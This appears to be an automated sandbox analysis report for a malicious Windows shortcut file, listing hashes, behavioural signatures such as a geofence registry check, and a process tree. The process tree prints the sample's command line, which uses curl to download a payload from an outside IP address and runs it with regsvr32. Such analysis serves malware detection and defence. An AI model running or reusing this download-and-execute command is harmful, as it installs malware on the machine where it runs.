Analysis
- max time kernel: 53s
- max time network: 58s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 23-06-2022 15:17
Static task: static1
Behavioral task: behavioral1
  Sample: DocumentsFolder_35334058_060139.lnk
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: DocumentsFolder_35334058_060139.lnk
  Resource: win10v2004-20220414-en
General
- Target: DocumentsFolder_35334058_060139.lnk
- Size: 1KB
- MD5: 2d3770c3daa570fa21b712f9dcc5da92
- SHA1: 291b441bd68939665764e62a9cfe5937d7a89869
- SHA256: 880798e380f7d1159c2d1486aa2458b218876d60607ad5f2f3a812a77ac7ad74
- SHA512: aa91edc8e8cf82b7beaa4f5557be8e842c1185ab43d94dc25c3be96ea134097e5dbb3341d34d9e2830c13cbdd6d2aa1e6f3e138d1568dd070fa42bbe0def3862
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes: cmd.exe
  description       | ioc                                                                                                  | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | cmd.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: cmd.exe, cmd.exe
  description                       | pid  | process | target process
  PID 1960 wrote to memory of 4204  | 1960 | cmd.exe | cmd.exe
  PID 1960 wrote to memory of 4204  | 1960 | cmd.exe | cmd.exe
  PID 4204 wrote to memory of 4056  | 4204 | cmd.exe | curl.exe
  PID 4204 wrote to memory of 4056  | 4204 | cmd.exe | curl.exe
Processes
- 1. C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\DocumentsFolder_35334058_060139.lnk
  Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - 2. C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /q /c curl -o C:\Users\Admin\AppData\Local\Temp\1.jpg -O http://194.36.191.243/717510.dat&regsvr32 C:\Users\Admin\AppData\Local\Temp\1.jpg
    Signatures: Suspicious use of WriteProcessMemory
    - 3. C:\Windows\system32\curl.exe
      Command line: curl -o C:\Users\Admin\AppData\Local\Temp\1.jpg -O http://194.36.191.243/717510.dat